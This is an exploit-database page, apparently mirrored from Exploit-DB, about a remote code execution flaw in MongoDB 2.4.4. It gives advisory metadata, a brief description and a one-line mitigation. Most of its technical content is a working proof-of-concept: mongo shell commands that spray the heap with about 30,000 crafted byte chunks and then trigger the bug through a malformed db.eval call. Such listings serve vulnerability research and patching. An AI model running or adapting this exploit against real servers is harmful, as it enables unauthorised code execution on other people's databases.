header-logo
Suggest Exploit
vendor:
MongoDB
by:
SecurityFocus
7,5
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: MongoDB
Affected Version From: 2.4.4
Affected Version To: 2.4.4
Patch Exists: YES
Related CWE: N/A
CPE: a:mongodb:mongodb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

MongoDB Remote Code Execution Vulnerability

MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code within the context of the affected application. MongoDB 2.4.4 is vulnerable; other versions may also be affected.

Mitigation:

Users should ensure that all user-supplied input is properly sanitized before being passed to the application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/61309/info

MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to execute arbitrary code within the context of the affected application.

MongoDB 2.4.4 is vulnerable; other versions may also be affected.

use databaseMapped

sizechunk=0x1338; chunk=""; for(i=0;i<sizechunk;i++){ chunk+="\x05\x7c\x77\x55\x08\x04\x00\x00"; } for(i=0;i<30000;i++){ db.my_collection.insert({my_chunk:chunk}) }

db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")');

Navigation

Suggest Exploit

Services By CQR